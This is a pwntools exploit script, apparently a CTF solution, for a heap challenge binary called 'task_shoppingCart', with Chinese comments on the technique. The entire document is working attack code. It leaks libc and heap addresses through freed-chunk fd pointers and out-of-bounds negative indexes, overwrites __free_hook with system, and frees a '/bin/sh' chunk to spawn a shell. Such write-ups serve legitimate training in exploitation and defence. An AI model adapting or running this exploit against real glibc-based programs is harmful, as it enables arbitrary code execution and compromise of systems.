from pwn import *
#context.log_level='debug'
cn = process('./task_shoppingCart')
elf = ELF('./task_shoppingCart')
libc = ELF('./libc-2.23.so')
strtoul_got = p64(elf.got['strtoul'])
def money(s):
cn.sendline('1')
cn.recvuntil('RMB or Dollar?')
cn.sendline(s)
def add(leng,name):
cn.sendline('1')
cn.recvuntil('How long is your goods name?')
cn.sendline(str(leng))
cn.sendline(name)
def delete(index):
cn.sendline('2')
cn.sendline(str(index))
def modify(index,value):
cn.sendline('3')
cn.sendline(str(index))
cn.sendline(value)
for i in range(0x13):
money(strtoul_got)#内容随意
money(strtoul_got)
success(hex(elf.plt['strtoul']))
cn.sendline('3')
#leak libc base
add(0x90,'a'*0x10)#unsortedbin 0
add(0x18,'/bin/sh\x00')#avoid to consolate with top chunk 1
delete(0)
cn.sendline('1')#add 2
cn.sendline('0')#size do not change fd
cn.sendline('3')#modify
cn.sendline('2')#Index
cn.recvuntil('OK, what would you like to modify ')
leak_addr=u64(cn.recv(6).ljust(8,'\x00'))
success('leak_addr:'+hex(leak_addr)) #main_arena + 232
libc_base = leak_addr-0x3c4c08 #main_arena - libc = 0x3c4b20 + 232(gdb)
'''
main_arena和libc之间具有固定的相对偏移0x3c4b20
'''
success('libc_base:'+hex(libc_base))
#gdb.attach(cn)
cn.sendline('a') #ramdom
'''
'''
这也是一种泄露地址的方法
将chunk free掉放入bin中,利用free函数将fd修改为相应的地址,然后malloc时不会修改fd的值
根据需要放入不同的bin,泄露libc的话放入unsortedbin,泄露heap的话放入fastbin,
'''
#leak heap
add(0x10,'d'*0xf)#3 fastbin
add(0x10,'c'*0xf)#4 fastbin
delete(3)
delete(4)
#gdb.attach(cn)
cn.sendline('1')#add 5
cn.sendline('0')#size do not change fd
cn.sendline('3')#modify
cn.sendline('5')#Index
cn.recvuntil('OK, what would you like to modify ')
heap = u64(cn.recv(6).ljust(8,'\x00'))
success('heap:'+hex(heap))# chunk3
cn.sendline('test')
'''
#leak data addr
'''
这里是泄露.data段中的一个数据,该数据的内容就是本地址。这个是否具有普遍性还有待调试
'''
cn.sendline('3')#modify
cn.sendline('-47')#Index
cn.recvuntil('OK, what would you like to modify ')
data_addr = u64(cn.recv(6).ljust(8,'\x00'))
success('data_addr:'+hex(data_addr))
cn.sendline(p64(data_addr))
#trim free_hook
'''
针对got表不能修改的情况下可以考虑修改free_hook,malloc_hook
'''
offset = 0x1c88 #free_hook - main_arena
free_hook_addr = leak_addr - 232 + offset
money_addr = data_addr + 0x38
success('money_addr:'+hex(money_addr))
modify(-20,p64(free_hook_addr))
modify(-20,p64(free_hook_addr))
modify(-18,p64(money_addr))
system = libc_base + libc.symbols['system']
success('system_addr:'+hex(system))
modify(-38,p64(system))
delete(1)
cn.interactive()